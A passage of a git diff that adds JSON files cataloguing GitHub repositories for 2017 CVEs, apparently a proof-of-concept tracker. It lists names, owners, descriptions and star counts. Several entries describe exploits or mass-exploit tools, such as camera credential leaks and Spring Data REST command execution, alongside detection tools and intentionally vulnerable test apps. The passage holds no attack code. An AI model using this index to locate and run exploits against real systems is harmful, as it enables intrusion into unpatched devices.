"2023-10-23T22:48:11Z", + "updated_at": "2023-10-23T22:48:48Z", + "pushed_at": "2023-10-24T09:36:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 721288926, + "name": "CVE-2017-7921", + "full_name": "b3pwn3d\/CVE-2017-7921", + "owner": { + "login": "b3pwn3d", + "id": 100018610, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/100018610?v=4", + "html_url": "https:\/\/github.com\/b3pwn3d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b3pwn3d\/CVE-2017-7921", + "description": null, + "fork": false, + "created_at": "2023-11-20T18:44:13Z", + "updated_at": "2023-11-20T18:50:24Z", + "pushed_at": "2023-11-20T18:50:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 751658099, + "name": "cve-2017-7921-Mass-Exploit", + "full_name": "yousouf-Tasfin\/cve-2017-7921-Mass-Exploit", + "owner": { + "login": "yousouf-Tasfin", + "id": 155293227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155293227?v=4", + "html_url": "https:\/\/github.com\/yousouf-Tasfin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yousouf-Tasfin\/cve-2017-7921-Mass-Exploit", + "description": null, + "fork": false, + "created_at": "2024-02-02T03:27:31Z", + "updated_at": "2024-11-05T15:16:54Z", + "pushed_at": "2024-02-07T10:01:30Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823083361, + "name": "HikVision-CVE-2017-7921", + "full_name": "kooroshsanaei\/HikVision-CVE-2017-7921", + "owner": { + "login": "kooroshsanaei", + "id": 59454315, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59454315?v=4", + "html_url": "https:\/\/github.com\/kooroshsanaei", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kooroshsanaei\/HikVision-CVE-2017-7921", + "description": " Test For CVE-2017–7921; ", + "fork": false, + "created_at": "2024-07-02T11:47:35Z", + "updated_at": "2024-11-13T19:15:00Z", + "pushed_at": "2024-07-02T12:00:01Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894493486, + "name": "hikvision_probe", + "full_name": "aengussong\/hikvision_probe", + "owner": { + "login": "aengussong", + "id": 26045876, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26045876?v=4", + "html_url": "https:\/\/github.com\/aengussong", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aengussong\/hikvision_probe", + "description": "Identify hikvision ip and probe for cve-s (CVE-2017-7921, CVE-2022-28171, CVE-2021-36260)", + "fork": false, + "created_at": "2024-11-26T13:02:18Z", + "updated_at": "2024-11-26T13:23:21Z", + "pushed_at": "2024-11-26T13:21:56Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-7998.json b/2017/CVE-2017-7998.json new file mode 100644 index 0000000000..597bc0e0e0 --- /dev/null +++ b/2017/CVE-2017-7998.json @@ -0,0 +1,36 @@ +[ + { + "id": 101155833, + "name": "CVE-2017-7998", + "full_name": "homjxi0e\/CVE-2017-7998", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-7998", + "description": " Denial of service by Exit in Terminal !! ", + "fork": false, + "created_at": "2017-08-23T08:17:10Z", + "updated_at": "2017-10-03T14:38:32Z", + "pushed_at": "2017-10-11T16:52:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "denial-of-service", + "terminal" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8046.json b/2017/CVE-2017-8046.json new file mode 100644 index 0000000000..a25d71dd44 --- /dev/null +++ b/2017/CVE-2017-8046.json @@ -0,0 +1,332 @@ +[ + { + "id": 105420015, + "name": "CVE-2017-8046-DEMO", + "full_name": "Soontao\/CVE-2017-8046-DEMO", + "owner": { + "login": "Soontao", + "id": 10473459, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10473459?v=4", + "html_url": "https:\/\/github.com\/Soontao", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Soontao\/CVE-2017-8046-DEMO", + "description": "SPRING DATA REST CVE-2017-8046 DEMO", + "fork": false, + "created_at": "2017-10-01T04:52:24Z", + "updated_at": "2024-03-06T05:50:43Z", + "pushed_at": "2023-12-15T02:30:30Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 110002512, + "name": "spring-data-rest-CVE-2017-8046", + "full_name": "sj\/spring-data-rest-CVE-2017-8046", + "owner": { + "login": "sj", + "id": 5082246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5082246?v=4", + "html_url": "https:\/\/github.com\/sj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sj\/spring-data-rest-CVE-2017-8046", + "description": "Fork of github.com\/spring-projects\/spring-data-rest (vulnerable to CVE-2017-8046)", + "fork": false, + "created_at": "2017-11-08T16:39:11Z", + "updated_at": "2018-03-08T02:37:48Z", + "pushed_at": "2022-05-25T23:12:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 124410900, + "name": "SpringBreakVulnerableApp", + "full_name": "m3ssap0\/SpringBreakVulnerableApp", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/SpringBreakVulnerableApp", + "description": "WARNING: This is a vulnerable application to test the exploit for the Spring Break vulnerability (CVE-2017-8046). Run it at your own risk!", + "fork": false, + "created_at": "2018-03-08T15:29:44Z", + "updated_at": "2020-10-18T01:21:57Z", + "pushed_at": "2018-10-08T23:18:25Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-8046", + "exploit", + "security", + "security-tools", + "spring-break", + "spring-data-rest", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 9, + "watchers": 11, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 124591869, + "name": "spring-break_cve-2017-8046", + "full_name": "m3ssap0\/spring-break_cve-2017-8046", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/spring-break_cve-2017-8046", + "description": "This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).", + "fork": false, + "created_at": "2018-03-09T20:51:19Z", + "updated_at": "2023-10-05T17:05:34Z", + "pushed_at": "2021-06-04T01:26:28Z", + "stargazers_count": 17, + "watchers_count": 17, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-8046", + "exploit", + "security", + "security-tools", + "spring-break", + "spring-data-rest", + "vulnerability", + "vulnerability-scanners" + ], + "visibility": "public", + "forks": 11, + "watchers": 17, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 124935868, + "name": "SpringBreakPoC", + "full_name": "FixYourFace\/SpringBreakPoC", + "owner": { + "login": "FixYourFace", + "id": 16994146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16994146?v=4", + "html_url": "https:\/\/github.com\/FixYourFace", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/FixYourFace\/SpringBreakPoC", + "description": "PoC for SpringBreak (CVE-2017-8046)", + "fork": false, + "created_at": "2018-03-12T18:49:45Z", + "updated_at": "2019-03-03T15:35:08Z", + "pushed_at": "2018-03-12T19:08:03Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 129776823, + "name": "spring-break-cve-2017-8046", + "full_name": "jkutner\/spring-break-cve-2017-8046", + "owner": { + "login": "jkutner", + "id": 1589, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1589?v=4", + "html_url": "https:\/\/github.com\/jkutner", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jkutner\/spring-break-cve-2017-8046", + "description": "This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).", + "fork": false, + "created_at": "2018-04-16T16:54:05Z", + "updated_at": "2018-08-09T02:14:12Z", + "pushed_at": "2018-04-16T17:00:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 150413982, + "name": "CVE-2017-8046", + "full_name": "bkhablenko\/CVE-2017-8046", + "owner": { + "login": "bkhablenko", + "id": 8275828, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8275828?v=4", + "html_url": "https:\/\/github.com\/bkhablenko", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bkhablenko\/CVE-2017-8046", + "description": null, + "fork": false, + "created_at": "2018-09-26T11:11:40Z", + "updated_at": "2018-09-26T11:18:18Z", + "pushed_at": "2018-09-26T11:18:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 166270192, + "name": "cve-2017-8046", + "full_name": "cved-sources\/cve-2017-8046", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-8046", + "description": "cve-2017-8046", + "fork": false, + "created_at": "2019-01-17T17:49:12Z", + "updated_at": "2021-04-15T21:28:28Z", + "pushed_at": "2021-04-15T21:28:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 183741969, + "name": "VulnerableSpringDataRest", + "full_name": "jsotiro\/VulnerableSpringDataRest", + "owner": { + "login": "jsotiro", + "id": 2410281, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2410281?v=4", + "html_url": "https:\/\/github.com\/jsotiro", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsotiro\/VulnerableSpringDataRest", + "description": "An intentionally vulnerable (CVE-2017-8046) SrpingData REST appl with Swagger Support for pentesting purposes", + "fork": false, + "created_at": "2019-04-27T07:23:53Z", + "updated_at": "2019-05-08T20:01:55Z", + "pushed_at": "2019-05-08T20:01:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 284192206, + "name": "CVE-2017-8046", + "full_name": "guanjivip\/CVE-2017-8046", + "owner": { + "login": "guanjivip", + "id": 13394144, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13394144?v=4", + "html_url": "https:\/\/github.com\/guanjivip", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/guanjivip\/CVE-2017-8046", + "description": "修改IP地址即可实现命令执行", + "fork": false, + "created_at": "2020-08-01T05:15:42Z", + "updated_at": "2020-08-01T05:15:54Z", + "pushed_at": "2020-08-01T05:15:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8225.json b/2017/CVE-2017-8225.json new file mode 100644 index 0000000000..01ff619ee4 --- /dev/null +++ b/2017/CVE-2017-8225.json @@ -0,0 +1,74 @@ +[ + { + "id": 422764021, + "name": "CVE-2017-8225", + "full_name": "kienquoc102\/CVE-2017-8225", + "owner": { + "login": "kienquoc102", + "id": 84182708, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84182708?v=4", + "html_url": "https:\/\/github.com\/kienquoc102", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kienquoc102\/CVE-2017-8225", + "description": null, + "fork": false, + "created_at": "2021-10-30T02:28:27Z", + "updated_at": "2024-02-03T07:24:55Z", + "pushed_at": "2021-10-30T02:29:57Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 689127082, + "name": "CVE-2017-8225-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2017-8225-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2017-8225-EXPLOIT", + "description": "A PoC exploit for CVE-2017-8225 - GoAhead System.ini Leak", + "fork": false, + "created_at": "2023-09-08T21:47:18Z", + "updated_at": "2024-10-14T08:55:50Z", + "pushed_at": "2023-09-10T05:52:37Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cameras", + "credential-gathering", + "credentials", + "cve-2017-8225", + "exploit", + "hacking", + "password", + "poc", + "username" + ], + "visibility": "public", + "forks": 3, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8295.json b/2017/CVE-2017-8295.json new file mode 100644 index 0000000000..e65de70a11 --- /dev/null +++ b/2017/CVE-2017-8295.json @@ -0,0 +1,95 @@ +[ + { + "id": 90299927, + "name": "CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset", + "full_name": "homjxi0e\/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-8295-WordPress-4.7.4---Unauthorized-Password-Reset", + "description": null, + "fork": false, + "created_at": "2017-05-04T19:05:12Z", + "updated_at": "2017-05-04T19:05:12Z", + "pushed_at": "2017-05-04T19:13:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 90396412, + "name": "wp-allowed-hosts", + "full_name": "alash3al\/wp-allowed-hosts", + "owner": { + "login": "alash3al", + "id": 3078292, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3078292?v=4", + "html_url": "https:\/\/github.com\/alash3al", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/alash3al\/wp-allowed-hosts", + "description": "a plugin that protects your wp site from the CVE-2017-8295 vulnerability", + "fork": false, + "created_at": "2017-05-05T16:34:17Z", + "updated_at": "2017-05-06T06:41:07Z", + "pushed_at": "2017-05-05T17:05:15Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 90453472, + "name": "CVE-2017-8295", + "full_name": "cyberheartmi9\/CVE-2017-8295", + "owner": { + "login": "cyberheartmi9", + "id": 12415756, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12415756?v=4", + "html_url": "https:\/\/github.com\/cyberheartmi9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cyberheartmi9\/CVE-2017-8295", + "description": null, + "fork": false, + "created_at": "2017-05-06T09:51:01Z", + "updated_at": "2024-08-12T19:29:38Z", + "pushed_at": "2019-10-22T07:08:19Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 20, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8367.json b/2017/CVE-2017-8367.json new file mode 100644 index 0000000000..33887fa50b --- /dev/null +++ b/2017/CVE-2017-8367.json @@ -0,0 +1,33 @@ +[ + { + "id": 372596294, + "name": "CVE-2017-8367", + "full_name": "rnnsz\/CVE-2017-8367", + "owner": { + "login": "rnnsz", + "id": 84464863, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84464863?v=4", + "html_url": "https:\/\/github.com\/rnnsz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rnnsz\/CVE-2017-8367", + "description": null, + "fork": false, + "created_at": "2021-05-31T18:27:32Z", + "updated_at": "2021-05-31T18:59:47Z", + "pushed_at": "2021-05-31T18:59:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8382.json b/2017/CVE-2017-8382.json new file mode 100644 index 0000000000..6702800ac6 --- /dev/null +++ b/2017/CVE-2017-8382.json @@ -0,0 +1,33 @@ +[ + { + "id": 91959764, + "name": "Admidio-3.2.8-CSRF-POC-by-Provensec-llc", + "full_name": "faizzaidi\/Admidio-3.2.8-CSRF-POC-by-Provensec-llc", + "owner": { + "login": "faizzaidi", + "id": 12153050, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12153050?v=4", + "html_url": "https:\/\/github.com\/faizzaidi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/faizzaidi\/Admidio-3.2.8-CSRF-POC-by-Provensec-llc", + "description": "Admidio 3.2.8 Cross-Site Request Forgery Assigned CVE Number: CVE-2017-8382", + "fork": false, + "created_at": "2017-05-21T13:36:51Z", + "updated_at": "2020-07-17T05:22:45Z", + "pushed_at": "2017-05-21T13:38:56Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8464.json b/2017/CVE-2017-8464.json new file mode 100644 index 0000000000..40acdf96af --- /dev/null +++ b/2017/CVE-2017-8464.json @@ -0,0 +1,250 @@ +[ + { + "id": 52461595, + "name": "CVE-2017-8464", + "full_name": "Elm0D\/CVE-2017-8464", + "owner": { + "login": "Elm0D", + "id": 11469105, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11469105?v=4", + "html_url": "https:\/\/github.com\/Elm0D", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Elm0D\/CVE-2017-8464", + "description": null, + "fork": false, + "created_at": "2016-02-24T17:36:29Z", + "updated_at": "2024-08-12T19:21:34Z", + "pushed_at": "2017-09-20T23:50:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 99062024, + "name": "CVE-2017-8464-EXP", + "full_name": "3gstudent\/CVE-2017-8464-EXP", + "owner": { + "login": "3gstudent", + "id": 15814408, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15814408?v=4", + "html_url": "https:\/\/github.com\/3gstudent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3gstudent\/CVE-2017-8464-EXP", + "description": "Support x86 and x64", + "fork": false, + "created_at": "2017-08-02T02:14:37Z", + "updated_at": "2024-08-12T19:31:42Z", + "pushed_at": "2021-04-17T01:39:48Z", + "stargazers_count": 66, + "watchers_count": 66, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 66, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 99573027, + "name": "CVE-2017-8464-exp-generator", + "full_name": "doudouhala\/CVE-2017-8464-exp-generator", + "owner": { + "login": "doudouhala", + "id": 30798606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30798606?v=4", + "html_url": "https:\/\/github.com\/doudouhala", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/doudouhala\/CVE-2017-8464-exp-generator", + "description": "this tool can generate a exp for cve-2017-8486, it is developed by python", + "fork": false, + "created_at": "2017-08-07T11:56:11Z", + "updated_at": "2024-05-08T08:39:26Z", + "pushed_at": "2017-08-07T12:42:33Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 8, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 105686692, + "name": "usbhijacking", + "full_name": "X-Vector\/usbhijacking", + "owner": { + "login": "X-Vector", + "id": 30379192, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30379192?v=4", + "html_url": "https:\/\/github.com\/X-Vector", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/X-Vector\/usbhijacking", + "description": "Usbhijacking | CVE-2017-8464", + "fork": false, + "created_at": "2017-10-03T18:18:28Z", + "updated_at": "2020-04-01T13:33:19Z", + "pushed_at": "2018-07-20T16:34:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 130337310, + "name": "CVE-2017-8464-EXP", + "full_name": "xssfile\/CVE-2017-8464-EXP", + "owner": { + "login": "xssfile", + "id": 38548622, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38548622?v=4", + "html_url": "https:\/\/github.com\/xssfile", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xssfile\/CVE-2017-8464-EXP", + "description": null, + "fork": false, + "created_at": "2018-04-20T09:01:03Z", + "updated_at": "2018-06-08T09:33:51Z", + "pushed_at": "2018-04-20T09:01:20Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 501060866, + "name": "DetectPacket-CVE-2017-8464", + "full_name": "TrG-1999\/DetectPacket-CVE-2017-8464", + "owner": { + "login": "TrG-1999", + "id": 59412424, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59412424?v=4", + "html_url": "https:\/\/github.com\/TrG-1999", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TrG-1999\/DetectPacket-CVE-2017-8464", + "description": "Exploit vulnerabilities and vulnerability prevention implementation", + "fork": false, + "created_at": "2022-06-08T01:39:48Z", + "updated_at": "2022-11-30T02:52:30Z", + "pushed_at": "2022-06-08T01:45:43Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 634923266, + "name": "Phat-hien-CVE-2017-8464", + "full_name": "tuankiethkt020\/Phat-hien-CVE-2017-8464", + "owner": { + "login": "tuankiethkt020", + "id": 57537230, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57537230?v=4", + "html_url": "https:\/\/github.com\/tuankiethkt020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tuankiethkt020\/Phat-hien-CVE-2017-8464", + "description": null, + "fork": false, + "created_at": "2023-05-01T14:59:04Z", + "updated_at": "2023-06-13T14:24:43Z", + "pushed_at": "2023-06-13T14:24:39Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724067112, + "name": "Detect-CVE-2017-8464", + "full_name": "TieuLong21Prosper\/Detect-CVE-2017-8464", + "owner": { + "login": "TieuLong21Prosper", + "id": 128500598, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128500598?v=4", + "html_url": "https:\/\/github.com\/TieuLong21Prosper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TieuLong21Prosper\/Detect-CVE-2017-8464", + "description": "- using python to detect cve-2017-8464 vulnerbilities", + "fork": false, + "created_at": "2023-11-27T10:28:47Z", + "updated_at": "2023-11-27T10:31:37Z", + "pushed_at": "2023-11-27T10:31:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8465.json b/2017/CVE-2017-8465.json new file mode 100644 index 0000000000..2ca7c2fb86 --- /dev/null +++ b/2017/CVE-2017-8465.json @@ -0,0 +1,33 @@ +[ + { + "id": 218245795, + "name": "CVE-2017-8465", + "full_name": "nghiadt1098\/CVE-2017-8465", + "owner": { + "login": "nghiadt1098", + "id": 28037088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28037088?v=4", + "html_url": "https:\/\/github.com\/nghiadt1098", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nghiadt1098\/CVE-2017-8465", + "description": "Exploit for CVE-2017-8465", + "fork": false, + "created_at": "2019-10-29T09:06:23Z", + "updated_at": "2019-10-29T09:07:19Z", + "pushed_at": "2019-10-29T09:07:17Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-8529.json b/2017/CVE-2017-8529.json new file mode 100644 index 0000000000..7423d679d4 --- /dev/null +++ b/2017/CVE-2017-8529.json @@ -0,0 +1,64 @@ +[ + { + "id": 239253819, + "name": "cve-2017-8529", + "full_name": "sfitpro\/cve-2017-8529", + "owner": { + "login": "sfitpro", + "id": 59578141, + 